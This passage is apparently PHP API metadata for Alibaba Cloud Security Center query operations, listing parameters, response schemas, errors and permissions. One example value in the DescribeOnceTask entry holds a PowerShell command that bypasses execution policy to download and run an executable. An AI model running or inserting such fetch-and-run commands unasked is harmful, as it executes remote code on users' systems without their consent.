=> 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D185B7FF-E24C-422D-83D3-C2A25C7A2727\\",\\n \\"NoticeConfigList\\": [\\n {\\n \\"TimeLimit\\": 1,\\n \\"AliUid\\": 0,\\n \\"CurrentPage\\": 1,\\n \\"Project\\": \\"sas_suspicious\\",\\n \\"Route\\": 7,\\n \\"Category\\": \\"Cspm\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeNoticeConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNoticeConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:DescribeNoticeConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeNsasSuspEventType' => [ 'summary' => 'Queries security alerting Alarm Metric.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92143', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '180.212.XX.XX', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name of the server.', 'type' => 'string', 'required' => false, 'example' => 'testECS', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the security alerting Alarm Metric.', 'type' => 'string', 'required' => false, 'example' => 'Unusual Logon', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the request. Set the value to **sas**, which indicates that the request is sent from Security Center.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers. Separate multiple UUIDs with commas (,).'."\n" .'> Call the [DescribeCloudCenterInstances](~~141932~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'f56406cb-916d-42db-b6f7-2ff79e34****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The container field. Valid values:'."\n" ."\n" .'- **clusterId**: cluster ID.', 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the container field.', 'type' => 'string', 'required' => false, 'example' => 'ca3108551c83c4d949106e1ab9e1e****', 'title' => ''], ], [ 'name' => 'MultiAccountActionType', 'in' => 'query', 'schema' => ['description' => 'The multi-account query type. Default value: **0**. Valid values:'."\n" .'- **0**: queries data of the current account.'."\n" .'- **1**: queries data of all accounts.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'SupportOperateCodeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of operation types supported by the alert.', 'type' => 'array', 'items' => ['description' => 'The operation type supported by the alert. Valid values:'."\n" .'- **AI.false_positive**: suspected false positive.'."\n" .'- **AI.real_attack**: real attack.'."\n" .'- **AI.Insufficient_information_to_evaluate**: unable to determine.', 'type' => 'string', 'required' => false, 'example' => 'AI.real_attack', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9FBC6E47-7508-58C9-9E76-528E118CB1CC', 'title' => ''], 'EventTypes' => [ 'description' => 'The list of security alerting Alarm Metric information.', 'type' => 'array', 'items' => [ 'description' => 'The security alerting Alarm Metric information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The security alerting Alarm Metric.', 'type' => 'string', 'example' => 'Unusual Logon', 'title' => ''], 'SuspEventCount' => ['description' => 'The number of assets associated with the security alert.', 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'Name' => ['description' => 'The name of the security alerting Alarm Metric.', 'type' => 'string', 'example' => 'Unusual Logon', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security alerting Alarm Metric', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNsasSuspEventType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeNsasSuspEventType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9FBC6E47-7508-58C9-9E76-528E118CB1CC\\",\\n \\"EventTypes\\": [\\n {\\n \\"Type\\": \\"Unusual Logon\\",\\n \\"SuspEventCount\\": 22,\\n \\"Name\\": \\"Unusual Logon\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeOfflineMachines' => [ 'summary' => 'Queries the information about the servers whose Security Center agent status is Offline.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '180.113.XX.XX', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **5**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '4', 'title' => ''], ], [ 'name' => 'RegionNo', 'in' => 'query', 'schema' => ['description' => 'The region in which the server resides.'."\n" ."\n" .'> The value of this parameter is the value of the Values parameter that is returned by calling the [DescribeCriteria](~~DescribeCriteria~~) operation. If the value of the **Name** parameter in the response is **regionId**, the value of the **Values** parameter indicates a region ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Os', 'in' => 'query', 'schema' => ['description' => 'The operating system of the server.'."\n" ."\n" .'> The value of this parameter is the value of the Values parameter that is returned by calling the [DescribeCriteria](~~DescribeCriteria~~) operation. If the value of the **Name** parameter in the response is **osType**, the value of the **Values** parameter indicates an operating system.'."\n", 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The information about the server that you want to query. The value can be the name or the public IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '172.20.XX.XX', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The source of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud.'."\n" .'* **1**: a third-party cloud server'."\n" .'* **2**: a server in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a lightweight asset'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'RegionIdStr', 'in' => 'query', 'schema' => ['description' => 'The region in which the server resides.'."\n" ."\n" .'> The value of this parameter is the value of the Values parameter that is returned by calling the [DescribeCriteria](~~DescribeCriteria~~) operation. If the value of the **Name** parameter in the response is **regionId**, the value of the **Values** parameter indicates a region ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], 'MachineList' => [ 'description' => 'An array that consists of the information about servers.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the server.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '6d5b361f-958d-48a8-a9d2-d6e82c1****', 'title' => ''], 'MachineRegion' => ['description' => 'The region in which the server resides.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '120.79.XX.XX', 'title' => ''], 'VendorName' => ['description' => 'The name of the service provider (SP) for the server.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'* **ALIYUN**: Alibaba Cloud'."\n" .'* **OUT**: a third-party service provider'."\n" .'* **IDC**: a data center'."\n" .'* **TENCENT**: Tencent Cloud'."\n" .'* **HUAWEICLOUD**: Huawei Cloud'."\n" .'* **Microsoft**: Microsoft'."\n" .'* **AWS**: Amazon Web Services (AWS)'."\n" .'* **TRIPARTITE**: a lightweight server'."\n", 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" ."\n" .'* **linux**'."\n" .'* **windows**'."\n" .'* **windows-2003**'."\n", 'type' => 'string', 'example' => 'linux', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.'."\n", 'type' => 'string', 'example' => 'sas-bdrvxb4b****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Vendor' => ['description' => 'The source of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud.'."\n" .'* **1**: a third-party cloud server'."\n" .'* **2**: a server in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a lightweight asset'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region in which the server resides.'."\n", 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"PageSize\\": 5,\\n \\"TotalCount\\": 44,\\n \\"MachineList\\": [\\n {\\n \\"Uuid\\": \\"6d5b361f-958d-48a8-a9d2-d6e82c1****\\",\\n \\"MachineRegion\\": \\"cn-hangzhou\\",\\n \\"InternetIp\\": \\"120.79.XX.XX\\",\\n \\"VendorName\\": \\"ALIYUN\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"Os\\": \\"linux\\",\\n \\"InstanceId\\": \\"sas-bdrvxb4b****\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"Vendor\\": 0,\\n \\"RegionId\\": \\"cn-shanghai\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeOfflineMachines', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOfflineMachines'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeOfflineMachines', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeOnceTask' => [ 'summary' => 'Queries a list of client tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92145', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => [ 'description' => 'The node type. Valid values:'."\n" .'- **VUL\\_CHECK\\_TASK**: vulnerability scanning node'."\n" .'- **CLIENT\\_PROBLEM\\_CHECK**: client node'."\n" .'- **CLIENT\\_DEV\\_OPS**: cloud O&M node'."\n" .'- **ASSET\\_SECURITY\\_CHECK**: asset information collection node'."\n" .'- **ASSET\\_REFRESH\\_HOST**: host asset synchronization node'."\n" .'> **TaskType** and **RootTaskId** cannot both be empty.', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => '', ], ], [ 'name' => 'RootTaskId', 'in' => 'query', 'schema' => ['description' => 'The root task ID.'."\n" .'> **TaskType** and **RootTaskId** cannot both be empty.', 'type' => 'string', 'required' => false, 'example' => 'bb5d657479bba5e1d308b6c9e85c9174', 'title' => ''], ], [ 'name' => 'StartTimeQuery', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the root task starts. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651737301000', 'title' => ''], ], [ 'name' => 'EndTimeQuery', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the root task ends. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651766520000', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings for the number of client tasks on each page in a paged query. Default value: **20**, which indicates that each page contains 20 client tasks.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The node source. Valid values include but are not limited to:'."\n" .'- **schedule**: automatic scheduling of vulnerability scanning'."\n" .'- **console**: one-click detection from the vulnerability scanning console', 'type' => 'string', 'required' => false, 'example' => 'console', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The task ID.', 'type' => 'string', 'required' => false, 'example' => 'd7b2acf8d362742123e4a84e1bf8****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data of client tasks.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of client tasks on each page in a paged query. Default value: **20**, which indicates that each page contains 20 client tasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of client tasks returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of client tasks displayed on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'TaskManageResponseList' => [ 'description' => 'The list of client task query results.', 'type' => 'array', 'items' => [ 'description' => 'The client task query result.', 'type' => 'object', 'properties' => [ 'TaskType' => [ 'description' => 'The task type. Valid values:'."\n" .'- **CLIENT\\_PROBLEM\\_CHECK**: client task'."\n" .'- **CLIENT\\_DEV\\_OPS**: cloud O&M task'."\n" .'- **ASSET\\_SECURITY\\_CHECK**: asset information collection task.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => '', ], 'Progress' => ['description' => 'The task progress, in percentage.', 'type' => 'string', 'example' => '10%', 'title' => ''], 'TaskStatus' => [ 'description' => 'The task status. Valid values:'."\n" .'- **1**: Started.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'enumValueTitles' => [], 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => '', ], 'DetailData' => ['description' => 'The task execution details. This parameter is in JSON format.'."\n" ."\n" .'- **causeCode**: the return code of the troubleshooting cause.'."\n" .'- **causeMsg**: the return message of the troubleshooting cause.'."\n" .'- **resCode**: the troubleshooting return code.'."\n" .'- **resMsg**: the troubleshooting return message.'."\n" .'- **problemType**: the problem type.'."\n" .'- **dispatchType**: the task dispatch method.'."\n" .'- **uuid**: the server UUID.'."\n" .'- **instanceId**: the ID of the server instance.'."\n" .'- **internetIp**: the public IP address of the server.'."\n" .'- **intranetIp**: the private IP address of the server.'."\n" .'- **instanceName**: the name of the server instance.'."\n" .'- **url**: the download URL of the troubleshooting log.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "dispatchType": "manual",'."\n" .' "causeMsg": [],'."\n" .' "causeCode": [],'."\n" .' "resCode": ['."\n" .' "1003"'."\n" .' ],'."\n" .' "resMsg": ['."\n" .' "powershell -executionpolicy bypass -c \\"(New-Object Net.WebClient).DownloadFile(\'http://aegis.alicdn.com/download/aegis_client_self_check/win32/aegis_checker.exe\', $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath(\'.\\\\\\\\aegis_checker.exe\'))\\"; \\"./aegis_checker.exe -b eyJtb2RlIjoxLCJqc3J2X2RvbWFpbiI6W10sImlzc3VlIjoib2ZmbGluZSIsInVwZGF0ZV9kb21haW4iOltdLCJ1dWlkIjoiaW5ldC1lYWUwNDg2Ny0wMDJmLTQyM2QtYWYwMC1jNzJjZDYyOWIyNDgiLCJjbWRfaWR4IjoiNDRjZThiZWI3ZGYyYTQxMjQ1NGM4ZDc5OTE1ODI1MzMifQ==\\""'."\n" .' ],'."\n" .' "problemType": "offline",'."\n" .' "uuid": "inet-eae04867-002f-423d-af00-c72cd629****"'."\n" .' }'."\n" .']', 'title' => ''], 'TaskStatusText' => [ 'description' => 'The text representation of the task status. Valid values:'."\n" .'- **INIT**: Pending.'."\n" .'- **START**: Started.'."\n" .'- **DISPATCH**: Self-check command dispatched.'."\n" .'- **SUCCESS**: Self-check completed.'."\n" .'- **FAIL**: Execution failed.'."\n" .'- **TIMEOUT**: Timed out.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'INIT', 'title' => '', ], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => ''], 'TaskStartTime' => ['description' => 'The timestamp when the task actually starts. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649732012000', 'title' => ''], 'TaskEndTime' => ['description' => 'The timestamp when the task actually ends. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1650267989000', 'title' => ''], 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => 'e900f528f5a6229bb640ca27cb44c98e', 'title' => ''], 'SuccessCount' => ['description' => 'The number of tasks that are executed successfully.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'FailCount' => ['description' => 'The number of tasks that failed to be executed.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ResultInfo' => ['description' => 'The task execution result.', 'type' => 'string', 'example' => 'successful', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 2\\n },\\n \\"TaskManageResponseList\\": [\\n {\\n \\"TaskType\\": \\"CLIENT_PROBLEM_CHECK\\",\\n \\"Progress\\": \\"10%\\",\\n \\"TaskStatus\\": 1,\\n \\"DetailData\\": \\"[\\\\n {\\\\n \\\\\\"dispatchType\\\\\\": \\\\\\"manual\\\\\\",\\\\n \\\\\\"causeMsg\\\\\\": [],\\\\n \\\\\\"causeCode\\\\\\": [],\\\\n \\\\\\"resCode\\\\\\": [\\\\n \\\\\\"1003\\\\\\"\\\\n ],\\\\n \\\\\\"resMsg\\\\\\": [\\\\n \\\\\\"powershell -executionpolicy bypass -c \\\\\\\\\\\\\\"(New-Object Net.WebClient).DownloadFile(\'http://aegis.alicdn.com/download/aegis_client_self_check/win32/aegis_checker.exe\', $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath(\'.\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\aegis_checker.exe\'))\\\\\\\\\\\\\\"; \\\\\\\\\\\\\\"./aegis_checker.exe -b eyJtb2RlIjoxLCJqc3J2X2RvbWFpbiI6W10sImlzc3VlIjoib2ZmbGluZSIsInVwZGF0ZV9kb21haW4iOltdLCJ1dWlkIjoiaW5ldC1lYWUwNDg2Ny0wMDJmLTQyM2QtYWYwMC1jNzJjZDYyOWIyNDgiLCJjbWRfaWR4IjoiNDRjZThiZWI3ZGYyYTQxMjQ1NGM4ZDc5OTE1ODI1MzMifQ==\\\\\\\\\\\\\\"\\\\\\"\\\\n ],\\\\n \\\\\\"problemType\\\\\\": \\\\\\"offline\\\\\\",\\\\n \\\\\\"uuid\\\\\\": \\\\\\"inet-eae04867-002f-423d-af00-c72cd629****\\\\\\"\\\\n }\\\\n]\\",\\n \\"TaskStatusText\\": \\"INIT\\",\\n \\"TaskName\\": \\"CLIENT_PROBLEM_CHECK\\",\\n \\"TaskStartTime\\": 1649732012000,\\n \\"TaskEndTime\\": 1650267989000,\\n \\"TaskId\\": \\"e900f528f5a6229bb640ca27cb44c98e\\",\\n \\"SuccessCount\\": 7,\\n \\"FailCount\\": 2,\\n \\"ResultInfo\\": \\"successful\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Query client tasks', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOnceTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeOnceTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeOnceTaskLeafRecordPage' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The task type. Valid values:'."\n" .'- **IMAGE_SCAN**: image scanning'."\n" .'- **IMAGE\\_REGISTRY\\_PULL**: image asset synchronization.', 'type' => 'string', 'required' => true, 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => ''], ], [ 'name' => 'RelateInfo', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to associate extended information.', 'type' => 'boolean', 'required' => true, 'example' => 'true', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task to retrieve.', 'type' => 'string', 'required' => false, 'example' => '1471d8ebb96795b41ede090b9758****', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The request source.', 'type' => 'string', 'required' => false, 'example' => 'console_batch', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1648438617000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1668064495000', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of statuses.', 'type' => 'array', 'items' => ['description' => 'The running status of the task. Valid values:'."\n" .'- **INIT**: Pending.'."\n" .'- **START**: Started.'."\n" .'- **SUCCESS**: Completed.'."\n" .'- **TIMEOUT**: Timed out.', 'type' => 'string', 'required' => false, 'example' => 'INIT', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of records in the query result.', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'Count' => ['description' => 'The number of records on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], ], 'title' => '', 'example' => '', ], 'OnceTasks' => [ 'description' => 'The list of task details.', 'type' => 'array', 'items' => [ 'description' => 'The list of task details.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status.', 'type' => 'string', 'example' => '0', 'title' => ''], 'StatusText' => ['description' => 'The running status of the task. Valid values:'."\n" .'- **INIT**: Pending.'."\n" .'- **START**: Started.'."\n" .'- **SUCCESS**: Completed.'."\n" .'- **TIMEOUT**: Timed out.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Progress' => ['description' => 'The export progress percentage (%).', 'type' => 'integer', 'format' => 'int64', 'example' => '75', 'title' => ''], 'RealRunTime' => ['description' => 'The task execution time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670307567000', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'Finish' => ['description' => 'Indicates whether the task is completed. Valid values:'."\n" .'- **0**: Not completed.'."\n" .'- **1**: Completed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of records. This parameter takes effect in a paged query with paging enabled.', 'type' => 'string', 'example' => '30', 'title' => ''], 'EndTime' => ['description' => 'The end time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670307567000', 'title' => ''], 'TaskType' => ['description' => 'The task type.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'StartTime' => ['description' => 'The start execution time.', 'type' => 'integer', 'format' => 'int64', 